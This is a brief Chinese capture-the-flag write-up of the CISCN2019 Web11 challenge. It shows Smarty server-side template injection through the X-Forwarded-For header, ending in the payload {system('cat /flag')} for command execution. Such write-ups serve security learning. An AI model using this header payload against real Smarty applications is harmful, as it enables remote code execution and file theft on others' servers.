[CISCN2019 华东南赛区]Web11.md

首页长这样

有两个api,分别通过/api/xff访问

同时页脚提示Build With Smarty!

可能是要寻找注入点

通过浏览器访问/api/xff会出错,抓包发现301响应的Location没有加上端口号

/xff可以通过修改X-Forwarded-For请求头来控制响应的内容,推测使用smarty来渲染响应,于是尝试对X-Forwarded-For进行注入

X-Forwarded-For: 123

123

X-Forwarded-For: {1+1}

2

X-Forwarded-For: {system('cat /flag')}

#Web #PHP #smarty #SSTI #RCE #HTTP #Header